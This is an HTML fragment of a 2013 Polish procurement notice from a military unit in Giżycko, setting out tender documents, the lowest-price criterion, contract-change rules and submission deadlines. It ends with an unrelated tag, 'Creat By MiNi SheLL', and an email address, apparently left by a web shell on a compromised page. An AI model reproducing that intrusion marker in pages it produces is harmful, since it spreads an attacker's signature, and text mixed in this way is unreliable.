<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, wzór umowy, dowód wniesienia wadium, pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie.W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy, W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu zgodnie z art. 23 ustawy Pzp</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku
do treści oferty, na podstawie której dokonano wyboru Wykonawcy
z zastrzeżeniem § 11 umowy. Zamawiający dopuszcza  zmianę terminu zakończenia robót w przypadku: wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego, klęsk żywiołowych uniemożliwiających realizację przedmioty zamówienia, wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy, Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w § 5 ust. 1 umowy w przypadku zmiany stawki podatku od towarów i usług w 2013 r. Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.24wog.wp.mil.pl, www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4352 ul. Nowowiejska 20, 11-500 Giżycko, kancelaria nr. 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 10:00, miejsce: Jednostka Wojskowa 4352 ul. Nowowiejska 20, 11-500 Giżycko, kancelaria nr 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com